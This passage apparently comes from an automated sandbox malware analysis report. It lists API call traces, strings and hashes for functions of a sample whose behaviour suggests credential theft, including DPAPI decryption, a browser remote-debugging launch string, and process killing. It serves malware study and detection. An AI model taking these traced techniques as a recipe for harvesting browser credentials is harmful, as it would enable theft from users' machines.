SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
lstrcpy.KERNEL32(00000000,?), ref: 00409950
StrStrA.SHLWAPI(?,00924F20), ref: 00409965
lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
lstrlenA.KERNEL32(?), ref: 00409996
wsprintfA.USER32 ref: 004099A6
lstrcpy.KERNEL32(?,?), ref: 004099BD
memset.MSVCRT ref: 004099D3

Strings

%s%s, xrefs: 004099A0
--remote-debugging-port=9229 --profile-directory=", xrefs: 004097F3
D, xrefs: 004099EA

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrcpy$Desktopwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
API String ID: 3051782728-1862457068
Opcode ID: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
Instruction ID: d19577a6994188075af4459c382a0e83ee01d0c412b4f1100e7ad714e1588002
Opcode Fuzzy Hash: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
Instruction Fuzzy Hash: 6091B5B1214340AFD720EF64DC45F9B77E9AF88704F10892DF649972D1DBB49904CBA6

Function 021BCF47 Relevance: 40.8, APIs: 27, Instructions: 310filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 021BCF63
FindFirstFileA.KERNEL32(?,?), ref: 021BCF7A
lstrcat.KERNEL32(?,?), ref: 021BCFC6
StrCmpCA.SHLWAPI(?,00431D70), ref: 021BCFD8
StrCmpCA.SHLWAPI(?,00431D74), ref: 021BCFF2
wsprintfA.USER32 ref: 021BD017
PathMatchSpecA.SHLWAPI(?,00638D64), ref: 021BD049
CoInitialize.OLE32(00000000), ref: 021BD055

Part of subcall function 021BCE47: CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 021BCE6D
Part of subcall function 021BCE47: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 021BCEAD
Part of subcall function 021BCE47: lstrcpyn.KERNEL32(?,?,00000104), ref: 021BCF30

CoUninitialize.COMBASE ref: 021BD070
lstrcat.KERNEL32(?,?), ref: 021BD095
lstrlen.KERNEL32(?), ref: 021BD0A2
StrCmpCA.SHLWAPI(?,0042D01C), ref: 021BD0BC
wsprintfA.USER32 ref: 021BD0E4
wsprintfA.USER32 ref: 021BD103
PathMatchSpecA.SHLWAPI(?,?), ref: 021BD117
wsprintfA.USER32 ref: 021BD13F
CopyFileA.KERNEL32(?,?,00000001), ref: 021BD158
CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 021BD177
GetFileSizeEx.KERNEL32(00000000,?), ref: 021BD18F
CloseHandle.KERNEL32(00000000), ref: 021BD19A
CloseHandle.KERNEL32(00000000), ref: 021BD1A6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 021BD1BB
lstrcpy.KERNEL32(00000000,?), ref: 021BD1FB
FindNextFileA.KERNEL32(?,?), ref: 021BD2F4
FindClose.KERNEL32(?), ref: 021BD306

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
String ID:
API String ID: 3860919712-0
Opcode ID: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction ID: 9ac14bd707ff663d1504fc8b8fdd5fedc10b907349ddb40c05582c188b41c740
Opcode Fuzzy Hash: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
Instruction Fuzzy Hash: 06C18375A00249AFCB25DF64DC44FEE77BAEF48304F104599F909A7190EB34AA84CFA0

Function 021A1820 Relevance: 25.7, APIs: 17, Instructions: 219stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A1849
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A1880
lstrcpy.KERNEL32(00000000,00000000), ref: 021A18D3
lstrcat.KERNEL32(00000000), ref: 021A18DD
lstrcpy.KERNEL32(00000000,00000000), ref: 021A1909
lstrcpy.KERNEL32(00000000,?), ref: 021A1A5A
lstrcat.KERNEL32(00000000,00000000), ref: 021A1A65

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat
String ID:
API String ID: 2276651480-0
Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction ID: 92dc486ba2c079a33372d57005b97873da12c8a70210e063c9bd87fce835fda6
Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
Instruction Fuzzy Hash: 23816179A41656AFDB21EF78CCA4AAE7BB6AF44309F040124EC09E7650DB34DD01DFA0

Function 021BE0B7 Relevance: 24.2, APIs: 16, Instructions: 170stringfilememoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 021BE0CF
RtlAllocateHeap.NTDLL(00000000), ref: 021BE0D6
wsprintfA.USER32 ref: 021BE0EE
FindFirstFileA.KERNEL32(?,?), ref: 021BE107
StrCmpCA.SHLWAPI(?,00431D70), ref: 021BE125
StrCmpCA.SHLWAPI(?,00431D74), ref: 021BE140
wsprintfA.USER32 ref: 021BE160
DeleteFileA.KERNEL32(?), ref: 021BE1B4
CopyFileA.KERNEL32(?,?,00000001), ref: 021BE17B

Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A169E
Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A16C0
Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A16E2
Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A1746

Part of subcall function 021BDD07: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 021BDD62
Part of subcall function 021BDD07: lstrcpy.KERNEL32(00000000,?), ref: 021BDD95
Part of subcall function 021BDD07: lstrcat.KERNEL32(?,00000000), ref: 021BDDA3
Part of subcall function 021BDD07: lstrcat.KERNEL32(?,00638B0C), ref: 021BDDBD
Part of subcall function 021BDD07: lstrcat.KERNEL32(?,?), ref: 021BDDD1
Part of subcall function 021BDD07: lstrcat.KERNEL32(?,00638DD8), ref: 021BDDE5
Part of subcall function 021BDD07: lstrcpy.KERNEL32(00000000,?), ref: 021BDE15
Part of subcall function 021BDD07: GetFileAttributesA.KERNEL32(00000000), ref: 021BDE1C

FindNextFileA.KERNEL32(00000000,?), ref: 021BE1C3
FindClose.KERNEL32(00000000), ref: 021BE1D2
lstrcat.KERNEL32(?,00638D24), ref: 021BE1F9
lstrcat.KERNEL32(?,00638A2C), ref: 021BE20B
lstrlen.KERNEL32(?), ref: 021BE216
lstrlen.KERNEL32(?), ref: 021BE225
lstrcpy.KERNEL32(00000000,?), ref: 021BE25B

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
String ID:
API String ID: 3181694991-0
Opcode ID: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
Instruction ID: a416e2c7ec7bb9732c832047e6e179d749a73857caa4fe6e0611b747ca5a0302
Opcode Fuzzy Hash: 2129fdeb310808f6ed0580cd61fd7b9a92f65e13c7ec26af8fe0cdf644d645b5
Instruction Fuzzy Hash: D15119B56043409FC724EF74D858ADA77EAAF88315F00892DF999C7290EB74D5088FA2

Function 021BD8A7 Relevance: 21.2, APIs: 14, Instructions: 183stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 021BD8C4
FindFirstFileA.KERNEL32(?,?), ref: 021BD8DB
StrCmpCA.SHLWAPI(?,00431D70), ref: 021BD8FB
StrCmpCA.SHLWAPI(?,00431D74), ref: 021BD915
lstrcat.KERNEL32(?,00638D24), ref: 021BD95A
lstrcat.KERNEL32(?,00638BF8), ref: 021BD96E
lstrcat.KERNEL32(?,?), ref: 021BD982
lstrcat.KERNEL32(?,?), ref: 021BD993
lstrcat.KERNEL32(?,00431D64), ref: 021BD9A5
lstrcat.KERNEL32(?,?), ref: 021BD9B9
lstrcpy.KERNEL32(00000000,?), ref: 021BD9F9
lstrcpy.KERNEL32(00000000,?), ref: 021BDA49
FindNextFileA.KERNEL32(00000000,?), ref: 021BDAAE
FindClose.KERNEL32(00000000), ref: 021BDABD

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
String ID:
API String ID: 50252434-0
Opcode ID: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
Instruction ID: 0a24d514c96a8a717b664d85c91db443c4ff0b084d9dea839bf444022386b008
Opcode Fuzzy Hash: e4102dfd33d95e035ea187f5226d1dfd03c7352a26a1a26f08ba0d47fd709faf
Instruction Fuzzy Hash: 6D6176B59002199FCB24EF74DC84ADD77BAAF48304F0085A9E949E7250DB74EA44CFA0

Function 004246C0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
Process32First.KERNEL32(00000000,00000128), ref: 004246E9
Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
StrCmpCA.SHLWAPI(?,?), ref: 0042470D
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
CloseHandle.KERNEL32(00000000), ref: 00424738
Process32Next.KERNEL32(00000000,00000128), ref: 00424746
CloseHandle.KERNEL32(00000000), ref: 00424751

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4

Function 021C2F67 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 021C7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 021C7495

GetKeyboardLayoutList.USER32(00000000,00000000), ref: 021C2FA2
LocalAlloc.KERNEL32(00000040,00000000), ref: 021C2FB4
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 021C2FC1
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 021C2FF3
LocalFree.KERNEL32(00000000), ref: 021C31D1

Strings

/ , xrefs: 021C3006

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction ID: 6bdb4329226a551caf2efdc7e3af2bd15066b392a3a29cc164d78247b604da26
Opcode Fuzzy Hash: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
Instruction Fuzzy Hash: 44B11435940204CFDB15CF58C948BA9B7F2BB54329F29C1ADD429AB3A1D7769C82CF90

Function 021AEFF7 Relevance: 9.1, APIs: 6, Instructions: 96stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 021AF022
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 021AF03D
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 021AF045
memcpy.MSVCRT(?,?,?), ref: 021AF0B8
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 021AF0EE
lstrcat.KERNEL32(0042D01C,0042D01C), ref: 021AF110

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction ID: 0a0d7d6736a92c82e58ae1094ec6c6274acdb149deeb911be75344f3a9a0ec66
Opcode Fuzzy Hash: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
Instruction Fuzzy Hash: 9131B279B00219ABDB108B98EC45BEEB779EF44705F044179FA09E3240DBB59A05CBE5

Function 021C4897 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 021C48AF
Process32First.KERNEL32(00000000,00000128), ref: 021C48BF
Process32Next.KERNEL32(00000000,00000128), ref: 021C48D1
StrCmpCA.SHLWAPI(?,00435644), ref: 021C48E7
Process32Next.KERNEL32(00000000,00000128), ref: 021C48F9
CloseHandle.KERNEL32(00000000), ref: 021C4904

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2284531361-0
Opcode ID: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
Instruction ID: dc6a2525e44a0d06729b5ff2d10493d524ddb68f88e499a09c85172650ccc457
Opcode Fuzzy Hash: 53f09dbe92254623ecc6bef3730497311d8cee6998608483a313aedc1c667fd6
Instruction Fuzzy Hash: 5E014B31645228ABD7249B60AC89FEA77BDEF0C751F0401D9F948D2150EBB49AA48EE1

Function 021C2E17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 021C2E49
RtlAllocateHeap.NTDLL(00000000), ref: 021C2E50
GetTimeZoneInformation.KERNEL32(?), ref: 021C2E5F
wsprintfA.USER32 ref: 021C2E8A

Strings

wwww, xrefs: 021C2E70

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 3317088062-671953474
Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction ID: 4a04ca66801b0598514220c62faffa517192ac9f504dc4b994cd708d2afcc2a4
Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
Instruction Fuzzy Hash: A501F7B1A04604ABC7189F58DC4ABAAB76AE784720F10432EFD16D72C0D7B419008AE5

Function 021C7E31 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 021C8699
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 021C86AE
UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 021C86B9
GetCurrentProcess.KERNEL32(C0000409), ref: 021C86D5
TerminateProcess.KERNEL32(00000000), ref: 021C86DC

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction ID: 5939d888b7aa19e2a41b51b879a9512c69c3ac3d6106946d19e9598a23880457
Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
Instruction Fuzzy Hash: B821C0B99003069FC761DF14F984A49BBB4FB28304F60607EF41897B61EBB069858F5D

Function 00407690 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
HeapAlloc.KERNEL32(00000000), ref: 004076A5
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
LocalFree.KERNEL32(?), ref: 004076F7

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4

Function 00424090 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocProcess
String ID:
API String ID: 3939037734-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4

Function 021C42F7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 021C4314
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 021C4323
RtlAllocateHeap.NTDLL(00000000), ref: 021C432A
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 021C435A

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: b493743295e4a5dfd91672d4a59304b3fddb3be188403c7d415a6fe0f1b07c34
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: 07015A74604215ABDB108FA5EC88BABBBADEF94315F105158BD0987240DB71E9408BA0

Function 00409BE0 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
memcpy.MSVCRT(00000000,?), ref: 00409C2A
LocalFree.KERNEL32(?), ref: 00409C37

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
